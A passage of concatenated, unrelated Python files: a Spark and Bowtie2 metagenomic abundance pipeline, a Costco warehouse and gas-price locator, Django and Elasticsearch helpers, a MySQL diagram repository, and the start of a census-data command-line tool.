                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] Reducing Reads to list of Genomes...")
            reads_to_genomes_list = map_reads_to_genomes.reduceByKey(lambda l1, l2: l1 + l2)
            if debug_mode:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] • Checkpoint 2: Reduce 1, reads_to_genomes_list")
                chk_2_s = time.time()
                checkpoint_2 = reads_to_genomes_list.count()
                chk_2_e = time.time()
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] TIME: " + str(timedelta(seconds=(chk_2_e - chk_2_s))))
            # ------------------------------------ Map 2, Fractional Reads --------------------------------------------
            #
            # Read Contributions.
            # Each read is normalized by the number of genomes it maps to. The idea is that reads that align to
            # multiple genomes will contribute less (have a higher denominator) than reads that align to
            # fewer genomes.
            #
            if verbose_output:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] Calculating Read Contributions...")
            read_contributions = reads_to_genomes_list.mapValues(lambda l1: 1 / float(len(l1)))
            if debug_mode:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] • Checkpoint 3: Map 2, read_contributions")
                chk_3_s = time.time()
                checkpoint_3 = read_contributions.count()
                chk_3_e = time.time()
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] TIME: " + str(timedelta(seconds=(chk_3_e - chk_3_s))))
            #
            # Once we have the read contributions, we'll JOIN them with the starting 'map_reads_to_genomes' RDD to
            # get an RDD that will map the read contribution to the Genome it aligns to.
            # Note: l[0] is the Read name (key), and l[1] is the VALUE (a list) after the join.
            #
            if verbose_output:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] Joining Read Contributions to Genomes...")
            read_contribution_to_genome = read_contributions.join(map_reads_to_genomes)\
                .map(lambda l: (l[1][0], "".join(l[1][1])))
            if debug_mode:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] • Checkpoint 4: read_contribution_to_genome")
                chk_4_s = time.time()
                checkpoint_4 = read_contribution_to_genome.count()
                chk_4_e = time.time()
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] TIME: " + str(timedelta(seconds=(chk_4_e - chk_4_s))))
            #
            # Now have an RDD mapping the Read Contributions to Genome Names, we'll flip the (KEY,VALUE) pairings
            # so that we have Genome Name as KEY and Read Contribution as Value.
            #
            if verbose_output:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] Flipping Genomes and Read Contributions...")
            genomes_to_read_contributions = read_contribution_to_genome.map(lambda x: (x[1], x[0]))
            if debug_mode:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] • Checkpoint 5: genomes_to_read_contributions")
                chk_5_s = time.time()
                checkpoint_5 = genomes_to_read_contributions.count()
                chk_5_e = time.time()
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] TIME: " + str(timedelta(seconds=(chk_5_e - chk_5_s))))
            # --------------------------------------- Reduce 2, Abundances --------------------------------------------
            #
            # Following the KEY-VALUE inversion, we do a reduceByKey() to aggregate the fractional counts for a
            # given genomic assembly and calculate its abundance.
            #
            if verbose_output:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] Calculating Genome Abundances...")
            genomic_assembly_abundances = genomes_to_read_contributions.reduceByKey(lambda l1, l2: l1 + l2)
            if debug_mode:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] • Checkpoint 6: Reduce 2, genomic_assembly_abundances")
                chk_6_s = time.time()
                checkpoint_6 = genomic_assembly_abundances.count()
                chk_6_e = time.time()
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] TIME: " + str(timedelta(seconds=(chk_6_e - chk_6_s))))
            #
            # Strain level abundances
            # At this point we have abundances at the genomic-assembly level (chromosomes, contigs, etc.), but what
            # we are after is abundances one level higher, i.e., at the Strain level. So we'll do one more map to
            # to set a key that we can reduce with at the Strain level.
            #
            # Note: The key to map here is critical. The assembly FASTA files need to be in a format that tells us
            # how to 'fold up' the assemblies into a parent taxa. The FASTA files we indexed had a Taxonomic ID
            # that tells us the Organism name (at the Strain level), and it is delimited by a period and located
            # at the beginning of the FASTA record.
            #
            strain_map = genomic_assembly_abundances.map(lambda x: ("GCA_" + x[0].split(".")[0], x[1]))
            if debug_mode:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] • Checkpoint 7: strain_map")
                chk_7_s = time.time()
                checkpoint_7 = strain_map.count()
                chk_7_e = time.time()
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] TIME: " + str(timedelta(seconds=(chk_7_e - chk_7_s))))
            #
            # Once the Mapping of organism names at the Strain level is complete, we can just Reduce them to
            # aggregate the Strain-level abundances.
            #
            strain_abundances = strain_map.reduceByKey(lambda l1, l2: l1 + l2).cache()
            if debug_mode:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] • Checkpoint 8: strain_abundances")
                chk_8_s = time.time()
                checkpoint_8 = strain_abundances.count()
                chk_8_e = time.time()
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                      "] TIME: " + str(timedelta(seconds=(chk_8_e - chk_8_s))))
            # --------------------------------------- Abundance Coalescing --------------------------------------------
            #
            # If requested, we'll continuously update the rolling count of abundances for the strains that we've
            # seen, or add new ones. Note that this involves a call to 'collect()' which brings back everything
            # to the Master node, so there is a slight hit on performance.
            #
            if coalesce_output:
                print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Updating abundance counts...")
                # Use 'collect()' to aggregate the counts for 'this' Shard and accumulate the rolling count.
                # We are violating the prime directive of Spark design patterns by using 'collect()', but in
                # practice, the call adds a negligible amount to the running time.
                # list_strain_abundances = strain_abundances.collect()
                #
                # for a_strain in list_strain_abundances:
                #     strain_name = a_strain[0]
                #     abundance_count = a_strain[1]
                #
                #     if strain_name in OVERALL_ABUNDANCES:
                #         OVERALL_ABUNDANCES[strain_name] += abundance_count
                #     else:
                #         OVERALL_ABUNDANCES[strain_name] = abundance_count
                abundace_rdd = strain_abundances.map(lambda x: accumulate_abundaces(x)).cache()
                # count() forces the map() above to run, which performs the accumulation.
                abundance_count = abundace_rdd.count()
            else:
                if save_to_s3:
                    output_file = output_file.replace("/abundances.txt", "")
                    output_dir_s3_path = "s3a://" + s3_output_bucket + "/" + output_file + "/shard_" + \
                                         str(RDD_COUNTER) + "/"
                    strain_abundances.map(lambda x: "%s\t%s" % (get_organism_name(x[0]), x[1])) \
                        .saveAsTextFile(output_dir_s3_path)
                # Careful with this. This will cause the individual files to be stored in Worker nodes, and
                # not in the Master node.
                # TODO: Refactor so that it sends it back to the Master, and stores it in the 'local' master path.
                # if save_to_local:
                #     output_dir_local_path = output_file.replace("abundances.txt", "/shard_" + str(RDD_COUNTER))
                #     abundances_list = strain_abundances.map(lambda x: "%s\t%s" % (get_organism_name(x[0]), x[1])) \
                #         .saveAsTextFile("file://" + output_dir_local_path)
            # ------------------------------------------ Shard Profiles -----------------------------------------------
            #
            # The user can specify whether to retain individual Shard profiles. The flag that controls this,
            # 'keep_shard_profiles', works in conjunction with the 'save_to_s3' and 'save_to_local' flags, so
            # the rolling shard profiles will be stored in the location that the user requested.
            #
            if keep_shard_profiles:
                # -------------------------------------- S3 Rolling Output --------------------------------------------
                if save_to_s3:
                    if verbose_output:
                        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                              "] Saving to S3 bucket...")
                    # Pointer to S3 filesystem.
                    sc._jsc.hadoopConfiguration().set("mapred.output.committer.class",
                                                      "org.apache.hadoop.mapred.FileOutputCommitter")
                    # NOTE: 'Path' here rebinds the name locally to the Hadoop Path class (it
                    # shadows pathlib2.Path inside this branch only).
                    URI = sc._gateway.jvm.java.net.URI
                    Path = sc._gateway.jvm.org.apache.hadoop.fs.Path
                    FileSystem = sc._gateway.jvm.org.apache.hadoop.fs.FileSystem
                    fs_uri_string = "s3a://" + s3_output_bucket + ""
                    fs = FileSystem.get(URI(fs_uri_string), sc._jsc.hadoopConfiguration())
                    shard_sub_dir = "shard-profiles"
                    output_file = output_file.replace("/abundances.txt", "")
                    shard_sub_dir_path = "s3a://" + s3_output_bucket + "/" + output_file + "/" + shard_sub_dir
                    # Create the 1st temporary output file through the 'saveAsTextFile()' method.
                    tmp_output_file = shard_sub_dir_path + "-tmp"
                    strain_abundances.map(lambda x: "%s\t%s" % (get_organism_name(x[0]), x[1])) \
                        .coalesce(1) \
                        .saveAsTextFile(tmp_output_file)
                    # This is the "tmp" file created by "saveAsTextFile()", by default its named "part-00000").
                    created_file_path = Path(tmp_output_file + "/part-00000")
                    # The gimmick here is to move the tmp file into a final location so that "saveAsTextFile()"
                    # can write again.
                    str_for_rename = shard_sub_dir_path + "/abundances-" + str(RDD_COUNTER) + ".txt"
                    renamed_file_path = Path(str_for_rename)
                    # Create the directory in which we'll be storing the shard profiles.
                    fs.mkdirs(Path(shard_sub_dir_path))
                    # The "rename()" function can be used as a "move()" if the second path is different.
                    fs.rename(created_file_path, renamed_file_path)
                    # Remove the "tmp" directory we created when we used "saveAsTextFile()".
                    fs.delete(Path(tmp_output_file))
                # ------------------------------------ Local Rolling Output -------------------------------------------
                if save_to_local:
                    if verbose_output:
                        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                              "] Saving to local filesystem...")
                    rdd_counter_str = "-" + str(RDD_COUNTER) + ".txt"
                    output_file = output_file.replace("abundances", "/shard_profiles/abundances")
                    output_file = output_file.replace(".txt", rdd_counter_str)
                    # NOTE(review): "wb" mode with csv.writer is Python-2 style; Python 3 would
                    # need mode "w" with newline="". Also, the file handle is never explicitly
                    # closed. Confirm the target interpreter before changing.
                    writer = csv.writer(open(output_file, "wb"), delimiter='|', lineterminator="\n", quotechar='',
                                        quoting=csv.QUOTE_NONE)
                    abundances_list = strain_abundances.map(lambda x: "%s\t%s" % (get_organism_name(x[0]), x[1])) \
                        .repartition(1).collect()
                    for a_line in abundances_list:
                        writer.writerow([a_line])
            # -------------------------------------------- End of Run -------------------------------------------------
            #
            # Housekeeping tasks go here. This completes the processing of a single streamed shard.
            # Increment the counter that we use to keep track of, and also use as an affix for a RDDs profile count.
            increment_rdd_count()
            # Set the time at which 'this' RDD (a sample shard) was last processed.
            set_time_of_last_rdd(time.time())
            print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Done.")
            print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]")
        # ---------------------------------------------- Empty RDD Case -----------------------------------------------
        #
        else:
            # If we've analyzed the same number of shards as those that were requested, we stop the streaming.
            # How we stop streaming, it depends on what flags were set. We'll stop the streaming if the time
            # between the last RDD processed and now is greater than a user-defined timeout, or 3 seconds for
            # the default. Another way to stop is to have processed a certain number of shards. If this number
            # has been reached, then we'll go ahead and stop.
            time_of_last_check = get_time_of_last_rdd()
            time_now = time.time()
            check_delta = timedelta(seconds=(time_now - time_of_last_check))
            check_delta_int = int(check_delta.seconds)
            # A zero timestamp means no shard has been processed yet, so there is nothing to time out.
            if time_of_last_check != 0:
                if shard_equals_counter() or check_delta_int > streaming_timeout:
                    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
                          "] All Requested Sample Shards Finished. (" + str(get_shards()) + " shards)")
                    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Stopping Streaming.")
                    set_analysis_end_time()
                    # The last thing we do is to stop the streaming context. Once this command finishes, we are
                    # jumped back-out into the code-block that called us — the 'flint.py' script.
                    ssc.stop()
    except Exception as ex:
        template = "[Flint - ERROR] An exception of type {0} occurred. Arguments:\n{1!r}"
        message = template.format(type(ex).__name__, ex.args)
        print(message)
# --------------------------------------------- Non-Streaming Job -----------------------------------------------------
#
#
def dispatch_local_job(mate_1, mate_2, tab5File, sampleID, sample_format, output_file,
                       save_to_s3, partition_size, sc):
    """
    Executes the requested Spark job in the cluster in a non-streaming method.
    Args:
        mate_1: Paired-end reads left-side read.
        mate_2: Paired-end reads right-side read.
        tab5File: Sample reads file in tab5 format.
        sampleID: The unique id of the sample.
        sample_format: What type of input format are the reads in (tab5, fastq, tab6, etc.).
        output_file: The path to the output file.
        save_to_s3: Flag for storing output to AWS S3.
        partition_size: Level of parallelization for RDDs that are not partitioned by the system.
        sc: Spark Context.
    Returns:
        Nothing, if all goes well it should return cleanly.
    """
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] ")
    print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]" + " Analyzing Sample " + sampleID +
          " (" + sample_format + ")")
    #
    # Paired-end Reads Code path.
    #
    if sample_format == "tab5":
        # ------------------------------------------ Alignment ----------------------------------------------------
        #
        # Alignment is delegated to Bowtie2 on each worker. The reads reach bowtie2 through Spark's pipe()
        # function, which streams the RDD contents to the mapping script's STDIN; the script's STDOUT
        # (SAM alignments) is captured by Spark and handed back to us as an RDD.
        #
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Loading Sample...")
        sampleRDD = loadTab5File(sc, tab5File)
        sampleReadsRDD = sampleRDD.values()
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Starting Alignment with Bowtie2...")
        alignment_start_time = time.time()
        alignmentsRDD = sampleReadsRDD.pipe(dnaMappingScript)
        # count() is an action: it forces the alignment pipeline to actually run,
        # which is what makes the wall-clock timing below meaningful.
        numberOfAlignments = alignmentsRDD.count()
        alignment_end_time = time.time()
        alignment_total_time = alignment_end_time - alignment_start_time
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Bowtie2 - Complete. " +
              "(" + str(timedelta(seconds=alignment_total_time)) + ")")
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]" + " Found: " +
              '{:0,.0f}'.format(numberOfAlignments) + " Alignments.")
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]")
        # --------------------------------------------- Map -------------------------------------------------------
        #
        # SAM format: [0] QNAME (read name), [1] FLAG, [2] RNAME (genome reference the read aligns to).
        # Each alignment line is parsed and broken into (QNAME, [RNAME]) pairs; the REDUCE step below
        # collects all genomes keyed by a unique read name.
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] MAP - Reads to Genomes (QNAME-RNAME).")
        mapReadToGenomes = alignmentsRDD.map(lambda line: (line.split("\t")[0], [line.split("\t")[2]] ))
        # -------------------------------------------- Reduce -----------------------------------------------------
        #
        # 'Reduce by Reads' gives a dictionary-like structure with the read name (QNAME) as KEY and the
        # list of genome references (RNAME) as VALUE, so each read's contribution can be computed.
        # Note the "+" operator concatenates the two lists.
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] REDUCE - Reads to list of Genomes.")
        readsToGenomesList = mapReadToGenomes.reduceByKey(lambda l1, l2: l1 + l2)
        # ---------------------------------- Fractional Reads & Abundances ----------------------------------------
        #
        # Each read is normalized by the number of genomes it maps to: reads that align to multiple genomes
        # contribute less (have a higher denominator) than reads that align to fewer genomes.
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]")
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Calculating Read Contributions...")
        readContributions = readsToGenomesList.mapValues(lambda l1: 1/float(len(l1)))
        # JOIN the contributions with the starting mapReadToGenomes RDD so each read contribution is
        # paired with the genome it aligns to. After the join, l[0] is the read name (key) and l[1]
        # is the joined VALUE (contribution, genome list).
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
              "] Joining Read Contributions to Genomes...")
        readContributionToGenome = readContributions.join(mapReadToGenomes)\
            .map(lambda l: (l[1][0], "".join(l[1][1])))
        # Flip the (KEY, VALUE) pairing so the genome name becomes the KEY and the contribution the VALUE.
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) +
              "] Flipping Genomes and Read Contributions...")
        genomesToReadContributions = readContributionToGenome.map(lambda x: (x[1], x[0]))
        # Aggregate the fractional counts per genome to obtain its abundance.
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Calculating Genome Abundances...")
        genomeAbundances = genomesToReadContributions.reduceByKey(lambda l1, l2: l1 + l2)
        # ------------------------------------------ Output Reports -----------------------------------------------
        #
        # Reports are written either to the S3 location from the initial JSON config or to a local CSV.
        #
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "]")
        print("[" + time.strftime('%d-%b-%Y %H:%M:%S', time.localtime()) + "] Writing Output Reports...")
        if save_to_s3:
            # Map the abundances into tab-delimited lines, then repartition to 1 so that a single
            # output file is produced instead of one per partition.
            genomeAbundances.map(lambda x: "%s\t%s" %(x[0],x[1]))\
                .repartition(1)\
                .saveAsTextFile(output_file)
        else:
            # Fix: the file handle was previously created inline in the csv.writer() call and never
            # closed (resource leak, possible unflushed output). A context manager guarantees
            # flush + close on every path.
            with open(output_file, "wb") as report_file:
                writer = csv.writer(report_file, delimiter='\t', lineterminator="\n")
                abundances = genomeAbundances.collect()
                # NOTE(review): this writes all (genome, abundance) pairs on a single CSV row, while
                # the streaming code path writes one entry per line — confirm which layout the
                # downstream consumers expect.
                writer.writerow(abundances)
    return
# ----------------------------------------------- Helper Functions ----------------------------------------------------
#
# Miscellaneous helper functions for Mapping, accumulating, reducing, etc.
#
def loadTab5File(sc, pathToSampleFile):
    """
    Load a tab5-formatted sample file into an RDD through the Hadoop File API.
    Each record has the layout: [name]\t[seq1]\t[qual1]\t[seq2]\t[qual2]\n
    Args:
        sc: A Spark context
        pathToSampleFile: A valid Hadoop file path (S3, HDFS, etc.).
    Returns:
        An RDD with a record number as KEY, and reads as VALUE.
    """
    input_format = 'org.apache.hadoop.mapreduce.lib.input.TextInputFormat'
    key_class = 'org.apache.hadoop.io.LongWritable'
    value_class = 'org.apache.hadoop.io.Text'
    # One tab5 record per newline-delimited line.
    hadoop_conf = {'textinputformat.record.delimiter': '\n'}
    return sc.newAPIHadoopFile(pathToSampleFile, input_format, key_class,
                               value_class, conf=hadoop_conf)
def loadFASTQFile(sc, pathToSampleFile):
    """
    Load a FASTQ file into an RDD through the Hadoop File API, using a custom
    record delimiter so each multi-line FASTQ record is parsed as one unit.
    Args:
        sc: A Spark context
        pathToSampleFile: A valid Hadoop file path (S3, HDFS, etc.).
    Returns:
        An RDD with a record number as KEY, and read attributes as VALUE.
    """
    input_format = 'org.apache.hadoop.mapreduce.lib.input.TextInputFormat'
    key_class = 'org.apache.hadoop.io.LongWritable'
    value_class = 'org.apache.hadoop.io.Text'
    # Records are separated by a newline followed by the FASTQ '@' header marker.
    hadoop_conf = {'textinputformat.record.delimiter': '\n@'}
    return sc.newAPIHadoopFile(pathToSampleFile, input_format, key_class,
                               value_class, conf=hadoop_conf)
def getBowtie2Command(bowtie2_node_path, bowtie2_index_path, bowtie2_index_name, bowtie2_number_threads):
    """
    Construct the Bowtie2 shell command (fast/local preset) as an argument list.
    Args:
        bowtie2_node_path: Directory on the worker node that contains the bowtie2 binary.
        bowtie2_index_path: Directory that holds the Bowtie2 index files.
        bowtie2_index_name: Base name of the Bowtie2 index.
        bowtie2_number_threads: Number of alignment threads to request.
    Returns:
        An array with the bowtie2 command split into tokens usable by popen().
    """
    index = bowtie2_index_path + "/" + bowtie2_index_name
    command_parts = [
        bowtie2_node_path + '/bowtie2',
        '--threads ' + str(bowtie2_number_threads),
        '--local',
        '-D 5',
        '-R 1',
        '-N 0',
        '-L 25',
        '-i \'"S,0,2.75"\'',
        '--no-discordant',
        '--no-mixed',
        '--no-contain',
        '--no-overlap',
        '--no-sq',
        '--no-hd',
        '--no-unal',
        '-q',
        '-x ' + index + ' --tab5 -',
    ]
    # shlex performs the same lexical split the original single-string form relied on.
    return shlex.split(" ".join(command_parts))
def getBowtie2CommandSensitive(bowtie2_node_path, bowtie2_index_path, bowtie2_index_name, bowtie2_number_threads):
    """
    Construct the Bowtie2 shell command (sensitive preset) as an argument list.
    Args:
        bowtie2_node_path: Directory on the worker node that contains the bowtie2 binary.
        bowtie2_index_path: Directory that holds the Bowtie2 index files.
        bowtie2_index_name: Base name of the Bowtie2 index.
        bowtie2_number_threads: Number of alignment threads to request.
    Returns:
        An array with the bowtie2 command split into tokens usable by popen().
    """
    index = bowtie2_index_path + "/" + bowtie2_index_name
    command_parts = [
        bowtie2_node_path + '/bowtie2',
        # Fix: the thread-count parameter was accepted but ignored (the preset
        # was hard-coded to 6 threads); honor the caller's requested count,
        # matching getBowtie2Command().
        '--threads ' + str(bowtie2_number_threads),
        '--local',
        '-D 20',
        '-R 3',
        '-N 0',
        '-L 20',
        '-i \'"S,1,0.50"\'',
        '--no-sq',
        '--no-hd',
        '--no-unal',
        '-q',
        '-x ' + index + ' --tab5 -',
    ]
    return shlex.split(" ".join(command_parts))
|
import os
import string
import requests
import urllib.parse
def getBingResponse(zipCode):
    '''Query the Bing Locations REST API for a ZIP code and return the raw response.'''
    # The Bing Maps key is expected in the environment (raises KeyError if absent).
    api_key = os.environ['BING_API_KEY']
    url = f'http://dev.virtualearth.net/REST/v1/Locations/{zipCode}?maxResults=1&key={api_key}'
    return requests.get(url)
def findCoordinates(bingResponse):
    '''Extract the coordinates of a ZIP code from a Bing response object.'''
    body = bingResponse.json()
    first_resource = body['resourceSets'][0]['resources'][0]
    return first_resource['geocodePoints'][0]['coordinates']
def getCoordinates(ZIP):
    '''Convenience function: look up a ZIP code and return its lat/long pair.'''
    response = getBingResponse(ZIP)
    return findCoordinates(response)
def getCostcoAJAX(coord, maxResponse=10):
    '''Return the Costco warehouse-lookup AJAX response for a pair of coordinates.'''
    lat = coord[0]
    lon = coord[1]
    print("Sending Request to Costco AJAX")
    session = requests.Session()
    # Browser-like headers; the endpoint rejects obviously non-browser clients.
    headers = {
        'Referrer-Policy': 'no-referrer',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36',
        "Upgrade-Insecure-Requests": "0",
        "DNT": "1",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
    }
    payload = (
        'http://www.costco.com/AjaxWarehouseBrowseLookupView?langId=-1&storeId=10301'
        f'&numOfWarehouses={maxResponse}'
        '&hasGas=false&hasTires=false&hasFood=false&hasHearing=false&hasPharmacy=false'
        '&hasOptical=false&hasBusiness=false&hasPhotoCenter=false&tiresCheckout=0'
        '&isTransferWarehouse=false&populateWarehouseDetails=true&warehousePickupCheckout=false'
        f'&latitude={lat}&longitude={lon}&countryCode=US'
    )
    # Hit the main site first so the session picks up any cookies it needs.
    print(session.get('http://costco.com', headers=headers))
    return session.get(payload, headers=headers)
class CostcoLocation:
    """One Costco warehouse parsed from an entry of the AJAX location payload."""

    def __init__(self, ajax):
        self.locationID = ajax['locationName']
        self.streetAddress = string.capwords(ajax['address1'])
        self.city = string.capwords(ajax['city'])
        self.state = ajax['state']
        # ZIP+4 values arrive as "12345-6789"; keep only the 5-digit portion.
        self.zip = ajax['zipCode'].split('-')[0]
        try:
            self.gasPrices(ajax['gasPrices'])
            self.gasHours(ajax['gasStationHours'])
        except KeyError:
            # Gas keys absent from the payload: this warehouse has no station.
            self.gas = False
        self.formatAddress()

    def gasPrices(self, gasAjax):
        self.gas = True
        # Drop the trailing fraction-of-a-cent digit from each price string.
        self.regular = gasAjax['regular'][:-1]
        self.premium = gasAjax['premium'][:-1]

    def gasHours(self, hoursAjax):
        self.weekdays = self.formatHours(hoursAjax[0]['time'])
        self.saturday = self.formatHours(hoursAjax[1]['time'])
        self.sunday = self.formatHours(hoursAjax[2]['time'])

    def formatHours(self, hours):
        # "6:00am - 9:30pm" -> ("6:00am", "9:30pm")
        parts = hours.split('-')
        return (parts[0].rstrip(" "), parts[1].lstrip(" "))

    def formatAddress(self):
        self.address2 = f'{self.city}, {self.state} {self.zip}'
        full_query = f'{self.streetAddress} {self.address2}'
        self.addressLink = (
            "https://www.google.com/maps/search/?api=1&query=Costco+Gasoline+"
            + urllib.parse.quote(full_query)
        )
def interpretCostcoAJAX(costcoAJAX):
    '''Interpret the raw Costco AJAX response into a list of CostcoLocation objects.'''
    print(f'Response from Costco AJAX: {costcoAJAX}')
    raw = costcoAJAX.json()
    # The endpoint always pads the array with an irrelevant leading True entry.
    del raw[0]
    return [CostcoLocation(entry) for entry in raw]
def getCostcoLocations(zip):
    '''Return the list of CostcoLocation objects for a given ZIP code.'''
    # NOTE: the parameter name shadows the builtin `zip`; kept for interface stability.
    coords = getCoordinates(zip)
    return interpretCostcoAJAX(getCostcoAJAX(coords))
|
import json
import requests
from django.conf import settings
from Category.models import Category, City
def get_permission(request):
    """Return the cities and categories the logged-in user has permission for.

    :param request: Django request object
    :return: (city list, category list)
    """
    all_categories = Category.objects.all()
    all_cities = City.objects.all()
    permitted_cities = [
        city for city in all_cities
        if request.user.has_perm("Channel.%s" % city.city_code)
    ]
    permitted_categories = [
        category for category in all_categories
        if request.user.has_perm("Channel.%s" % category.category_code)
    ]
    return permitted_cities, permitted_categories
def get_redis_prefix_key(key, key_prefix, version):
    """Custom Redis key function that returns the key unchanged.

    :param key: the Redis key
    :param key_prefix: key prefix (not applied)
    :param version: version number (not applied)
    :return: the key itself, with no prefix or version attached
    """
    return key
def put_to_es(index, put_data):
    """PUT a document to Elasticsearch and return the decoded response.

    :param index: the ES index to write to
    :param put_data: the data to store
    :return: the ES response parsed into a dict
    """
    endpoint = settings.ES_HOST % index
    json_headers = {"Content-Type": "application/json"}
    response = requests.put(endpoint, json=put_data, headers=json_headers)
    return json.loads(response.content)
|
from typing import List, Optional
from uuid import UUID
from c4maker_server.adapters.models import DiagramDB, UserAccessDB
from c4maker_server.adapters.mysql.mysql_client import MySQLClient
from c4maker_server.domain.entities.diagram import Diagram
from c4maker_server.domain.entities.user import User
from c4maker_server.services.ports.diagram_repository import DiagramRepository
class MySQLDiagramRepository(DiagramRepository):
    """MySQL-backed implementation of the DiagramRepository port."""

    def __init__(self, mysql_client: MySQLClient):
        # Thin wrapper around the shared MySQL/SQLAlchemy client.
        self.mysql_client = mysql_client

    def create(self, diagram: Diagram):
        """Persist a new diagram by mapping the entity onto its DB model."""
        diagram_db = DiagramDB(diagram)
        self.mysql_client.add(diagram_db)

    def update(self, diagram: Diagram):
        """Load the existing row, copy the entity's fields onto it, and save."""
        diagram_db = self.__find_db_obj_by_id(str(diagram.id))
        diagram_db.update_properties(diagram)
        self.mysql_client.update(diagram_db)

    def delete(self, diagram_id: UUID):
        """Delete the diagram with the given id; no-op when it does not exist."""
        diagram_db = self.__find_db_obj_by_id(str(diagram_id))
        if not diagram_db:
            return
        self.mysql_client.delete(diagram_db)

    def find_by_id(self, diagram_id: UUID) -> Optional[Diagram]:
        """Return the diagram entity for the given id, or None when absent."""
        diagram_db = self.__find_db_obj_by_id(str(diagram_id))
        if not diagram_db:
            return None
        return diagram_db.to_entity()

    def find_all_by_user(self, user: User) -> List[Diagram]:
        """Return the diagrams associated with the given user's access records."""
        # NOTE(review): this queries DiagramDB while filtering on
        # UserAccessDB.user_id with no explicit join, then reads `.diagram`
        # off the results as if they were UserAccessDB rows — it looks like
        # it should be `query(UserAccessDB)`. Verify against the ORM models.
        user_accesses_db = self.mysql_client.db.session.query(DiagramDB).filter(UserAccessDB.user_id == str(user.id))
        return [user_access_db.diagram.to_entity() for user_access_db in user_accesses_db]

    def __find_db_obj_by_id(self, diagram_id: str) -> DiagramDB:
        # Primary-key lookup via the session (returns None when not found).
        return self.mysql_client.db.session.query(DiagramDB).get(diagram_id)
|
#!/usr/bin/python3
import argparse
from datetime import datetime
from logger import logger
import sys
from tablib import Dataset
from request_utils import *
from presets import *
from bdl_query import BDLMultiCityQuery, BDLMultiVariableQuery
from explore import explore_subjects
class Requests:
    """String constants naming the request types supported by this CLI."""
    births = "births"
    deaths = "deaths"
    population = "population"
    population_by_age_and_gender = "population_by_age_and_gender"
def main(argv):
    """Parse command-line options and dispatch the requested action.

    Args:
        argv: the argument list to parse (typically sys.argv[1:]).
    """
    parser = argparse.ArgumentParser(description="")
    parser.add_argument("-r", "--request", help=f"One of the following:{requestHelp()}")
    parser.add_argument("-y", "--year", required=False)
    parser.add_argument("-e", "--export", action="store_true")
    parser.add_argument("-x", "--explore-subjects", action='store_true')
    # Fix: the argv parameter was previously ignored — parse_args() silently
    # re-read sys.argv. Passing argv through keeps main() honest and testable.
    args = parser.parse_args(argv)
    if args.request:
        handleRequest(args)
    if args.explore_subjects:
        explore_subjects()
def exportToXLSX(data):
    """Export rows of data to a timestamped .xlsx file in the working directory.

    Args:
        data: iterable of row sequences to append to the spreadsheet.
    """
    xls = Dataset()
    for row in data:
        xls.append(row)
    now = datetime.now()
    # NOTE(review): ':' characters in the timestamp are not valid in Windows
    # file names — confirm the target platforms before relying on this format.
    timestamp = f"{now.year}-{now.month}-{now.day}T{now.hour}:{now.minute}:{now.second}"
    filename = f"results_{timestamp}.xlsx"
    with open(filename, "wb") as f:
        f.write(xls.export("xlsx"))
    # Fix: the success message previously logged a garbled placeholder instead
    # of the file that was actually written.
    logger.info(f"Data exported successfully ({filename})")
def handleRequest(args):
    """Build and execute the BDL query named by args.request, logging results.

